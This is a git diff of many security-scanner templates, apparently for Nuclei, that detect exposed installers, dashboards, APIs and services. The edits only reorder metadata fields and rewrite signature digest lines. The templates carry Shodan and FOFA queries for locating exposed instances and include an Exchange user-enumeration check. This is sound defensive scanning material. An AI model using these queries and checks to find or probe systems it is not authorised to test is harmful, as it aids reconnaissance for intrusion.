diff --git a/http/misconfiguration/installer/webuzo-installer.yaml b/http/misconfiguration/installer/webuzo-installer.yaml
index 2e33eda9a6..656bdc8d53 100644
--- a/http/misconfiguration/installer/webuzo-installer.yaml
+++ b/http/misconfiguration/installer/webuzo-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Webuzo is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:softaculous:webuzo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Webuzo Installer"
- product: webuzo
vendor: softaculous
+ product: webuzo
+ shodan-query: title:"Webuzo Installer"
tags: misconfig,webuzo,install,exposure
- classification:
- cpe: cpe:2.3:a:softaculous:webuzo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402201e9e336d440f29f998b483a0b4a878c0a8eaba3e1150df1eee20fe3b90fd19a402204d9ed6fce922e80a4de77abc56e6dbc362d8be9ad0213fc12a906af6ff1f950b:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402201e9e336d440f29f998b483a0b4a878c0a8eaba3e1150df1eee20fe3b90fd19a402204d9ed6fce922e80a4de77abc56e6dbc362d8be9ad0213fc12a906af6ff1f950b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/wiki-js-installer.yaml b/http/misconfiguration/installer/wiki-js-installer.yaml
index 99dd2867ca..85ed43441b 100644
--- a/http/misconfiguration/installer/wiki-js-installer.yaml
+++ b/http/misconfiguration/installer/wiki-js-installer.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Checks for the presence of a Wiki.js Setup Page.
+ classification:
+ cpe: cpe:2.3:a:requarks:wiki.js:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Wiki.js Setup"
- product: wiki.js
vendor: requarks
+ product: wiki.js
+ shodan-query: title:"Wiki.js Setup"
tags: install,wiki-js,exposure,misconfig
- classification:
- cpe: cpe:2.3:a:requarks:wiki.js:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100bbb2395502245442e79f84e2278eea8816e8227be09f9073f749909276f09f9502205ddadd76af727b1dccb27988ad1402b2b0363a727e91739111caaabbcc9f0843:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100bbb2395502245442e79f84e2278eea8816e8227be09f9073f749909276f09f9502205ddadd76af727b1dccb27988ad1402b2b0363a727e91739111caaabbcc9f0843:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/wowonder-installer.yaml b/http/misconfiguration/installer/wowonder-installer.yaml
index 53dcf1873e..a6c94cb0aa 100644
--- a/http/misconfiguration/installer/wowonder-installer.yaml
+++ b/http/misconfiguration/installer/wowonder-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed WoWonder installation page.
reference:
- https://www.wowonder.com/
+ classification:
+ cpe: cpe:2.3:a:wowonder:wowonder:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: body="WoWonder | Installation"
- product: wowonder
vendor: wowonder
+ product: wowonder
+ fofa-query: body="WoWonder | Installation"
tags: misconfig,install,exposure,wowonder
- classification:
- cpe: cpe:2.3:a:wowonder:wowonder:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221009a5a2cc204c9ff35aebce83e319cd2c22ad4bbd6672b60facc2358c145525f7d022100fa304b531230e4c25c03410b6026764a4bbf5dd944643c0ad90c141bce68c692:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009a5a2cc204c9ff35aebce83e319cd2c22ad4bbd6672b60facc2358c145525f7d022100fa304b531230e4c25c03410b6026764a4bbf5dd944643c0ad90c141bce68c692:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/yzmcms-installer.yaml b/http/misconfiguration/installer/yzmcms-installer.yaml
index 6070b36b92..97077840c2 100644
--- a/http/misconfiguration/installer/yzmcms-installer.yaml
+++ b/http/misconfiguration/installer/yzmcms-installer.yaml
@@ -5,17 +5,17 @@ info:
author: ritikchaddha
severity: high
description: YzmCMS is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:yzmcms:yzmcms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: yzmcms
+ product: yzmcms
shodan-query: title:"YzmCMS"
fofa-query: title="YzmCMS"
- product: yzmcms
- vendor: yzmcms
tags: misconfig,yzmcms,install,exposure
- classification:
- cpe: cpe:2.3:a:yzmcms:yzmcms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220115b33497f0588b82da07382818c3838389b11d86165aacc007740c2ac01c1d50221008dab4fc62cabd1fb70c967a32b1e31a6b1e08187e0f7bbf1bb1cbae75a193125:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220115b33497f0588b82da07382818c3838389b11d86165aacc007740c2ac01c1d50221008dab4fc62cabd1fb70c967a32b1e31a6b1e08187e0f7bbf1bb1cbae75a193125:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/zencart-installer.yaml b/http/misconfiguration/installer/zencart-installer.yaml
index be2faeda57..17395fcf7d 100644
--- a/http/misconfiguration/installer/zencart-installer.yaml
+++ b/http/misconfiguration/installer/zencart-installer.yaml
@@ -7,17 +7,17 @@ info:
description: Zen Cart is susceptible to the Installation page exposure due to misconfiguration.
reference:
- https://www.zen-cart.com/
+ classification:
+ cpe: cpe:2.3:a:zen-cart:zen_cart:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: zen-cart
+ product: zen_cart
shodan-query: html:"shopping cart program by zen cart"
fofa-query: title="Installer" && icon_hash="899320116"
- product: zen_cart
- vendor: zen-cart
tags: misconfig,zencart,install,exposure
- classification:
- cpe: cpe:2.3:a:zen-cart:zen_cart:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220186141ea271e865ffc608b9d1e05bd48a7004e2f67d90e6abe28f03b12f609a00221009533d5330fed8366314bf91338d33bf7b492f1042cdf4861019f3417058e57a4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220186141ea271e865ffc608b9d1e05bd48a7004e2f67d90e6abe28f03b12f609a00221009533d5330fed8366314bf91338d33bf7b492f1042cdf4861019f3417058e57a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/jaeger-ui-dashboard.yaml b/http/misconfiguration/jaeger-ui-dashboard.yaml
index 47053eded9..baa8c536c8 100644
--- a/http/misconfiguration/jaeger-ui-dashboard.yaml
+++ b/http/misconfiguration/jaeger-ui-dashboard.yaml
@@ -7,16 +7,16 @@ info:
description: Jaeger UI dashboard is exposed.
reference:
- https://www.jaegertracing.io/
- metadata:
- max-request: 1
- verified: true
- shodan-query: http.title:"Jaeger UI"
- product: jaeger_ui
- vendor: jaegertracing
- tags: misconfig
-
classification:
cpe: cpe:2.3:a:jaegertracing:jaeger_ui:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: jaegertracing
+ product: jaeger_ui
+ shodan-query: http.title:"Jaeger UI"
+ tags: misconfig
+
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
group: 1
regex:
- '(?i)"gitVersion":\s*"([a-z0-9.]+)"'
-# digest: 4a0a004730450221009744e482a43765fcb4d6e9ca67516ee198f39abe9d78abecdb461f16af05dfb802206c97e9f23527f1d978b394c17b09d44c7c8f7c48fc6092bce26e67ad18e26a7a:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221009744e482a43765fcb4d6e9ca67516ee198f39abe9d78abecdb461f16af05dfb802206c97e9f23527f1d978b394c17b09d44c7c8f7c48fc6092bce26e67ad18e26a7a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/jenkins/jenkins-openuser-register.yaml b/http/misconfiguration/jenkins/jenkins-openuser-register.yaml
index 004b9bed0b..6a04b853af 100644
--- a/http/misconfiguration/jenkins/jenkins-openuser-register.yaml
+++ b/http/misconfiguration/jenkins/jenkins-openuser-register.yaml
@@ -8,16 +8,16 @@ info:
remediation: Its recommended to turn off user registration.
reference:
- https://www.acunetix.com/vulnerabilities/web/jenkins-open-user-registration/
+ classification:
+ cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: "X-Jenkins"
- product: jenkins
vendor: jenkins
+ product: jenkins
+ shodan-query: "X-Jenkins"
tags: misconfig,jenkins,apache,tomcat
- classification:
- cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022072093faa81551e2704ad9828f77ce884b472c7bb2892f91dea642eb298b763b90221009954d38b921bcdf5d495b32ea81c566d16ebc9e63c7ea016eb7ab791b539f621:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022072093faa81551e2704ad9828f77ce884b472c7bb2892f91dea642eb298b763b90221009954d38b921bcdf5d495b32ea81c566d16ebc9e63c7ea016eb7ab791b539f621:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/jetty-showcontexts-enable.yaml b/http/misconfiguration/jetty-showcontexts-enable.yaml
index 443a8766a5..0455ae0e41 100644
--- a/http/misconfiguration/jetty-showcontexts-enable.yaml
+++ b/http/misconfiguration/jetty-showcontexts-enable.yaml
@@ -8,16 +8,16 @@ info:
reference:
- https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jetty-showcontexts-enable.yaml
- https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/
+ classification:
+ cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"contexts known to this"
- product: jetty
vendor: eclipse
+ product: jetty
+ shodan-query: html:"contexts known to this"
tags: jetty,misconfig
- classification:
- cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 404
-# digest: 4b0a004830460221009482a085c0c67a40e4664c523d9232e10e999e3b79c6aff2869552a958f169ba022100bd5ca81660b790ed872e803d1d72059943a5772a09fbdd3212540013557c89d9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009482a085c0c67a40e4664c523d9232e10e999e3b79c6aff2869552a958f169ba022100bd5ca81660b790ed872e803d1d72059943a5772a09fbdd3212540013557c89d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/jupyter-notebooks-exposed.yaml b/http/misconfiguration/jupyter-notebooks-exposed.yaml
index 0abb93a568..1cb8f1df07 100644
--- a/http/misconfiguration/jupyter-notebooks-exposed.yaml
+++ b/http/misconfiguration/jupyter-notebooks-exposed.yaml
@@ -7,15 +7,15 @@ info:
description: Jupyter notebooks are exposed.
reference:
- https://blog.aquasec.com/python-ransomware-jupyter-notebook
- metadata:
- max-request: 1
- shodan-query: title:"Home Page - Select or create a notebook"
- product: notebook
- vendor: jupyter
- tags: jupyter,misconfig
-
classification:
cpe: cpe:2.3:a:jupyter:notebook:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: jupyter
+ product: notebook
+ shodan-query: title:"Home Page - Select or create a notebook"
+ tags: jupyter,misconfig
+
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
- 'Home Page - Select or create a notebook '
- ' There are no notebooks running. '
condition: or
-# digest: 490a004630440220056b8320d6fc00b76e31cadb754a31e74fe935c35026de59dec051b1d9bcc04202205007bba0cbf0ca7cb6dbb4baa2b4fd6d068f56f1cef29d71819be7bbec9af277:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220056b8320d6fc00b76e31cadb754a31e74fe935c35026de59dec051b1d9bcc04202205007bba0cbf0ca7cb6dbb4baa2b4fd6d068f56f1cef29d71819be7bbec9af277:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/kubernetes/kube-state-metrics.yaml b/http/misconfiguration/kubernetes/kube-state-metrics.yaml
index aadd0500de..12c92da482 100644
--- a/http/misconfiguration/kubernetes/kube-state-metrics.yaml
+++ b/http/misconfiguration/kubernetes/kube-state-metrics.yaml
@@ -6,16 +6,16 @@ info:
severity: low
description: |
An attacker can detect the public instance of a Kube-State-Metrics metrics. The Kubernetes API server exposes data about the count, health, and availability of pods, nodes, and other Kubernetes objects.
+ classification:
+ cpe: cpe:2.3:a:kubernetes:kube-state-metrics:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:Kube-state-metrics
- product: kube-state-metrics
vendor: kubernetes
+ product: kube-state-metrics
+ shodan-query: title:Kube-state-metrics
tags: misconfig,exposure,kube-state-metrics,k8s,kubernetes
- classification:
- cpe: cpe:2.3:a:kubernetes:kube-state-metrics:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,4 @@ http:
status:
- 200
-# digest: 490a004630440220751e26ea8820611c3b8f083667509aebadd54301a9820aabbf11926c1994300402201688aae6d39e28b14d60088ff490a9913276829f2d9c2d7d9095a0434f80094a:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220751e26ea8820611c3b8f083667509aebadd54301a9820aabbf11926c1994300402201688aae6d39e28b14d60088ff490a9913276829f2d9c2d7d9095a0434f80094a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/label-studio-signup.yaml b/http/misconfiguration/label-studio-signup.yaml
index a7e88041d2..606b8e4a70 100644
--- a/http/misconfiguration/label-studio-signup.yaml
+++ b/http/misconfiguration/label-studio-signup.yaml
@@ -6,16 +6,16 @@ info:
severity: unknown
description: |
Detects the presence of the Label Studio sign-up.
+ classification:
+ cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-1649949475
- product: label_studio
vendor: heartex
+ product: label_studio
+ shodan-query: http.favicon.hash:-1649949475
tags: label-studio,sign-up,misconfig
- classification:
- cpe: cpe:2.3:a:heartex:label_studio:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -36,4 +36,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205360b5136f0174241907a5708d4bfa1d8a1e466da79575530410a753cf7a7ae10220244689bc748ea06f098089b5ddb8fe157a180c13c1700ae1036e03707fb66178:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402205360b5136f0174241907a5708d4bfa1d8a1e466da79575530410a753cf7a7ae10220244689bc748ea06f098089b5ddb8fe157a180c13c1700ae1036e03707fb66178:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/libvirt-exporter-metrics.yaml b/http/misconfiguration/libvirt-exporter-metrics.yaml
index f84cdd4df5..9482afc5c3 100644
--- a/http/misconfiguration/libvirt-exporter-metrics.yaml
+++ b/http/misconfiguration/libvirt-exporter-metrics.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: low
description: Libvirt Exporter is leaking metrics.
+ classification:
+ cpe: cpe:2.3:a:redhat:libvirt:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Libvirt"
- product: libvirt
vendor: redhat
+ product: libvirt
+ shodan-query: title:"Libvirt"
tags: libvirt,exposure,debug,misconfig
- classification:
- cpe: cpe:2.3:a:redhat:libvirt:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100ac9bbd9334308cc65e44dc00ebbf9f01d35b668591a9bd160eb4413f33ecae49022011278789fb2751d9091be3986d3725b641966f1201ff2ae95abf08fb0791b7cf:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100ac9bbd9334308cc65e44dc00ebbf9f01d35b668591a9bd160eb4413f33ecae49022011278789fb2751d9091be3986d3725b641966f1201ff2ae95abf08fb0791b7cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/liferay/liferay-api.yaml b/http/misconfiguration/liferay/liferay-api.yaml
index 1ab70b5ca0..2f73c5ad83 100644
--- a/http/misconfiguration/liferay/liferay-api.yaml
+++ b/http/misconfiguration/liferay/liferay-api.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: info
reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java
+ classification:
+ cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Liferay"
- product: liferay_portal
vendor: liferay
+ product: liferay_portal
+ shodan-query: title:"Liferay"
tags: liferay,exposure,api,misconfig
- classification:
- cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
status:
- 404
-# digest: 4a0a00473045022100b6913004c4a95a7d6a50eb72b70a81e4476030fa9d5308573cd4c03de66713fc02201b1379f60747a88aa48f7c9840e21a51d35a8015ef7f0298acd5d53e5e4cde40:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100b6913004c4a95a7d6a50eb72b70a81e4476030fa9d5308573cd4c03de66713fc02201b1379f60747a88aa48f7c9840e21a51d35a8015ef7f0298acd5d53e5e4cde40:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/liferay/liferay-axis.yaml b/http/misconfiguration/liferay/liferay-axis.yaml
index 4d80df4686..cdee008cf1 100644
--- a/http/misconfiguration/liferay/liferay-axis.yaml
+++ b/http/misconfiguration/liferay/liferay-axis.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: info
reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java
+ classification:
+ cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Liferay"
- product: liferay_portal
vendor: liferay
+ product: liferay_portal
+ shodan-query: title:"Liferay"
tags: misconfig,exposure,liferay,api
- classification:
- cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100844cea6b891f1e88f60abea8ef53b09b843c7da579b44dccc51cc0e98e1e27010221008d720a018887c0d09cf1957815849fae34ddfd6faf0381e741705a1270fe8e31:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100844cea6b891f1e88f60abea8ef53b09b843c7da579b44dccc51cc0e98e1e27010221008d720a018887c0d09cf1957815849fae34ddfd6faf0381e741705a1270fe8e31:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/liferay/liferay-jsonws.yaml b/http/misconfiguration/liferay/liferay-jsonws.yaml
index e8e6f3b1d2..775ca36a5f 100644
--- a/http/misconfiguration/liferay/liferay-jsonws.yaml
+++ b/http/misconfiguration/liferay/liferay-jsonws.yaml
@@ -8,16 +8,16 @@ info:
reference:
- https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java
- https://liferay.dev/blogs/-/blogs/securing-the-api-jsonws-ui?_com_liferay_blogs_web_portlet_BlogsPortlet_showFlags=true&scroll=_com_liferay_blogs_web_portlet_BlogsPortlet_discussionContainer
+ classification:
+ cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Liferay"
- product: liferay_portal
vendor: liferay
+ product: liferay_portal
+ shodan-query: title:"Liferay"
tags: liferay,exposure,api,misconfig
- classification:
- cpe: cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c04b1fa69c1e83b856f13dd449760aaa26a18fe39ac690f5e94a44ea7f60fb00022100c86817556b46fab3d595d843b77926c4f6656e9ab9d8df2fffad5af2c6f9b7fd:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c04b1fa69c1e83b856f13dd449760aaa26a18fe39ac690f5e94a44ea7f60fb00022100c86817556b46fab3d595d843b77926c4f6656e9ab9d8df2fffad5af2c6f9b7fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/locust-exposure.yaml b/http/misconfiguration/locust-exposure.yaml
index 7cddc14949..97a1911609 100644
--- a/http/misconfiguration/locust-exposure.yaml
+++ b/http/misconfiguration/locust-exposure.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDK,bhutch
severity: medium
description: Locust is exposed.
+ classification:
+ cpe: cpe:2.3:a:locust:locust:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Locust"
- product: locust
vendor: locust
+ product: locust
+ shodan-query: title:"Locust"
tags: exposure,locust,misconfig
- classification:
- cpe: cpe:2.3:a:locust:locust:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220755c610c3605c8aa0565acacb3939c31921c647442ac69cdf782155522339674022100fa6b4781f15d398972b7a7a1e42ca0bc3c04f538b2c5b4c3a8d0f7777ed0ce5b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220755c610c3605c8aa0565acacb3939c31921c647442ac69cdf782155522339674022100fa6b4781f15d398972b7a7a1e42ca0bc3c04f538b2c5b4c3a8d0f7777ed0ce5b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/manage-engine-ad-search.yaml b/http/misconfiguration/manage-engine-ad-search.yaml
index 925e8d7e54..bd9b95495e 100644
--- a/http/misconfiguration/manage-engine-ad-search.yaml
+++ b/http/misconfiguration/manage-engine-ad-search.yaml
@@ -5,16 +5,16 @@ info:
author: PR3R00T
severity: high
description: Manage Engine AD Manager service can be configured to allow anonymous users to browse the AD list remotely.
+ classification:
+ cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"ManageEngine"
- product: manageengine_admanager_plus
vendor: zohocorp
+ product: manageengine_admanager_plus
+ shodan-query: title:"ManageEngine"
tags: unauth,misconfig
- classification:
- cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022074265f61eea8f5d170a6a71de9470b85fa69ad269f080759c9b2b4237f05dc72022100af312aa6397b9b68a20b5c312e0bc870cfb6b57ee9fd193396ef950da766261b:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022074265f61eea8f5d170a6a71de9470b85fa69ad269f080759c9b2b4237f05dc72022100af312aa6397b9b68a20b5c312e0bc870cfb6b57ee9fd193396ef950da766261b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/mongod-exposure.yaml b/http/misconfiguration/mongod-exposure.yaml
index 6ac8ba01ef..8eeaecd0ba 100644
--- a/http/misconfiguration/mongod-exposure.yaml
+++ b/http/misconfiguration/mongod-exposure.yaml
@@ -4,16 +4,16 @@ info:
name: MongoD Server - Exposure
author: DhiyaneshDk
severity: low
+ classification:
+ cpe: cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"mongod"
- product: mongodb
vendor: mongodb
+ product: mongodb
+ shodan-query: html:"mongod"
tags: mongod,exposure,info-leak
- classification:
- cpe: cpe:2.3:a:mongodb:mongodb:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221008fe15b8f67398c3d37ad238f27498ac2e8c59e4a3e919cdb65ec15d078ab58da02207bb1fb40632fdbe0809a030f18072ad0f10b4774a13b7f443a817037fb4ca50d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221008fe15b8f67398c3d37ad238f27498ac2e8c59e4a3e919cdb65ec15d078ab58da02207bb1fb40632fdbe0809a030f18072ad0f10b4774a13b7f443a817037fb4ca50d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/ms-exchange-user-enum.yaml b/http/misconfiguration/ms-exchange-user-enum.yaml
index 223e16904e..4cd2a778d1 100644
--- a/http/misconfiguration/ms-exchange-user-enum.yaml
+++ b/http/misconfiguration/ms-exchange-user-enum.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://www.msxfaq.de/exchange/autodiscover/autodiscover_v2.htm
- https://github.com/righettod/toolbox-pentest-web/blob/master/docs/4-HINTS_ARCHIVED.md#user-enumeration-techniques-for-microsoft-exchange
+ classification:
+ cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:outlook exchange
- product: exchange_server
vendor: microsoft
+ product: exchange_server
+ shodan-query: http.title:outlook exchange
tags: ms-exchange,microsoft,misconfig,enum
- classification:
- cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -41,4 +41,5 @@ http:
group: 1
regex:
- '(?i)Email=([A-Za-z0-9@%.-_]+)'
-# digest: 4b0a00483046022100fa802c6a26e51ad0676a8328798a1bc0499ce3f0849d70480ea6b221663a54cc0221008bc2ebb595c31754153f5db660c3ed317d417abfca2795a855c49d5b6b1c0232:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100fa802c6a26e51ad0676a8328798a1bc0499ce3f0849d70480ea6b221663a54cc0221008bc2ebb595c31754153f5db660c3ed317d417abfca2795a855c49d5b6b1c0232:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/multilaser-pro-setup.yaml b/http/misconfiguration/multilaser-pro-setup.yaml
index 40ef251883..d87f758efd 100644
--- a/http/misconfiguration/multilaser-pro-setup.yaml
+++ b/http/misconfiguration/multilaser-pro-setup.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: This allows the user to access quick setup settings and configuration page through /wizard.htm.
+ classification:
+ cpe: cpe:2.3:o:multilaser:ac1200_re018_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Setup Wizard" http.favicon.hash:2055322029
- product: ac1200_re018_firmware
vendor: multilaser
+ product: ac1200_re018_firmware
+ shodan-query: title:"Setup Wizard" http.favicon.hash:2055322029
tags: misconfig,multilaser,setup,config
- classification:
- cpe: cpe:2.3:o:multilaser:ac1200_re018_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502202f346f311c3979bdbf5f0e4ad13b5cc8b8cf9e5e708f21e508af78d09427d817022100fa95cdf952736b2a2ca3e9d9b13f7384538016cad00d68d9bd7d687a29679f36:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502202f346f311c3979bdbf5f0e4ad13b5cc8b8cf9e5e708f21e508af78d09427d817022100fa95cdf952736b2a2ca3e9d9b13f7384538016cad00d68d9bd7d687a29679f36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/mysql-history.yaml b/http/misconfiguration/mysql-history.yaml
index f3bd0bbe5a..8046be11b1 100644
--- a/http/misconfiguration/mysql-history.yaml
+++ b/http/misconfiguration/mysql-history.yaml
@@ -8,16 +8,16 @@ info:
The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands.
reference:
- http://doc.docs.sk/mysql-refman-5.5/mysql-history-file.html
+ classification:
+ cpe: cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"mysql_history"
- product: mysql
vendor: oracle
+ product: mysql
+ shodan-query: html:"mysql_history"
tags: misconfig,disclosure,config
- classification:
- cpe: cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -55,4 +55,4 @@ http:
status:
- 200
-# digest: 490a0046304402204a3e73fd4764e2ab60a4edeb79644228fa98d42ac7ccea958bde5dd4a124fbeb02201f70da8af717f2a5d68b47ecbcddc16b8692f9d3e8821a28cdf3f0db6dfe46b6:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402204a3e73fd4764e2ab60a4edeb79644228fa98d42ac7ccea958bde5dd4a124fbeb02201f70da8af717f2a5d68b47ecbcddc16b8692f9d3e8821a28cdf3f0db6dfe46b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml
index c25cd9049f..05a011e1c7 100644
--- a/http/misconfiguration/nacos/nacos-create-user.yaml
+++ b/http/misconfiguration/nacos/nacos-create-user.yaml
